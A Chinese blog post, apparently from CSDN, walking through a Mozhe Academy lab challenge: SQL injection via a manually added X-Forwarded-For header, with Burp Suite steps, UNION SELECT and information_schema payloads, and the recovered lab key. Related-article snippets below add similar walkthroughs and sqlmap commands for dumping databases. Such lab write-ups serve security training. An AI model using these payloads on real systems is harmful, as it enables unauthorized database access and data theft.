HTTP头注入漏洞测试(X-Forwarded-for)

最新推荐文章于 2024-08-27 10:34:01 发布
最新推荐文章于 2024-08-27 10:34:01 发布
阅读量811 收藏 2
点赞数
文章标签: 墨者学院 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc_de_csdn/article/details/100067485
版权

1.使用BrupSuite捕获flag.php页面的报文并发送到Repeater
2.发现报文中并没有X-Forwarded-for条目,自己添加
3.在X-Forwarded-for条目后面使用mysql注入语句测试注入
1.判断字段:使用order by,测试出有四个字段
2.使用union select 1,2,3,4 查看回显的位置
3.判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())
4.判断列名 union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’)
5.判断值 union select 1,2,3,(select group_concat(name) from flag)
6.得到flag
4.通过flag得到KEY:mozhe1784f90efb33e3e9c3b0a991ca6
分析:重点在于自己添加X-Forwarded-for,其余就是正常的mysql注入

cc_de_csdn
关注
墨者学院HTTP注入漏洞测试(X-Forwarded-for)
qq_43817824的博客
07-24 1244
打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。 设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。 3.order by 判断表数量,最后发现是4 4.union select 1,2,3,4测试注入点的位置是在4,通过union select 1,2,3,(...
墨者学院-HTTP注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1600
一、审题 这题从题目,也可以看放包后的回显可以知道是http的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
0x2A.HTTP注入漏洞测试(X-Forwarded-for)
qq_31679787的博客
10-22 287
该题可以进行手注或者使用sqlmap; 首先进行手注,抓包后添加X-Forwarded-for:*'测试发现并没有报错,而且这样保存下来在sqlmap中检测也检测不到SQL注入; 修改为* or 1=1会报错,但是后续测试也会出问题,只有不添加ip地址或者*才能正常进行sql注入; 通过or 1=1检测是否能进行sql注入; 查询显示位,结果为4的时候显示正常; 通过联合查询查询...
十大常见web漏洞(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
08-27 1745
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的广泛使用,Web应用已经融入到日常生活中的各个方面:网上购物、网络银行应用、证券股票交易、政府行政审批等等。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果Java、PHP、ASP等程序语言的编程人员的安全意识不足,对程序参数输入等检查不严格等,会导致Web应用安全问题层出不穷。
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 3378
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
墨者学院 - X-Forwarded-For注入漏洞实战
多崎巡礼的博客
08-28 1461
burp抓包,将抓到数据存为  xxx.txt 爆数据库 sqlmap.py -r xxx.txt --dbs --batch 爆表名 sqlmap.py -r xxx.txt -d 数据库名 --table --batch 爆表中的字段 sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch 爆字段中的值 sqlmap.py -r ...
CTF-HTTP注入漏洞测试(X-Forwarded-for)
asd158923328的博客
08-21 2276
根据题意 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求字段。 进入环境,打开跳转页 打开Burp Suite ,抓包,右键发送给repeater,填入X-Forwarded-For,首先判断是否可注入。 order by 判断表数量,从1开始依次试试,最后发现是4 union select 1,2...
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6366
墨者学院-X-Forwarded-For注入漏洞实战
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1344
小羊学安全 任重而道远 ~
nginx代理模式下,伪造X-Forwarded-For测试(清空X-Forwarded-For)
weixin_34253126的博客
10-31 1232
测试环境: nginx+resinIP: 内网:172.16.100.10客户端IP:123.123.123.123测试页面: test.jsp<%out.println(“x-forwarded-for: ” + request.getHeader(“x-forwarded-for”));out.println(“remote hosts: ” + request.g...
HTTP 请求中的 X-Forwarded-For
热门推荐
赶路人儿
08-01 2万+
通过名字就知道,X-Forwarded-For 是一个 HTTP 扩展部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。X-Forwarded-For 请求格式非常简单,就这样: X-Forwarded-For: client, prox
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7801
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求,以及remote_add
墨者 - X-Forwarded-For注入漏洞实战
吃肉唐僧的博客
07-10 4082
X-Forwarded-For 刷题之前先知道这个是什么东西,X-Forwarded-For 是一个 HTTP 扩展部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入RFC 7239(Forwarded...
head注入(X-Forwarded-For)
qq_39416206的博客
03-08 2261
head注入
墨者学院 X-Forwarded-For注入漏洞实战
crasher123的博客
06-19 1855
SQLMap是一个基于Python编写的工具,因此需要安装Python。可以从Python官方网站下载Python安装包,也可以使用包管理器进行安装。如果Python已经安装,则会显示Python的版本号。请求信息中多加一条X-Forwarded-For:*得到库表名user和login,继续攻击user表。运行后会显示SQLMap的欢迎信息和命令行帮助。得到数据库名称为webcalender,进行扫描。安装burpsuite和sqlmap。2.安装Python。4.运行SQLMap。
x-forwarded-for手工注入(超详细)
1
05-12 1229
使用靶场来进行演示。 访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下 虽然是乱码,但是看到里面有ip,发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff,就很奇怪,自己加上。 发现xff的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...
x-forwarded-for注入漏洞
03-16
x-forwarded-for注入漏洞是一种网络安全漏洞,攻击者可以通过伪造HTTP请求中的x-forwarded-for字段,来欺骗服务器认为请求来自于受信任的IP地址,从而绕过IP地址过滤等安全措施,进而进行攻击。这种漏洞常见于代理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值